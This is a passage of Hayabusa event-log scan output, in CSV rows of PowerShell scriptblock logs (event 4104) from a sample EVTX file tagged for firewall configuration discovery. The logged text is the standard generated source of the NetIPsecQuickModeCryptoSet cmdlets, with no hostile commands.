${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder =",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, 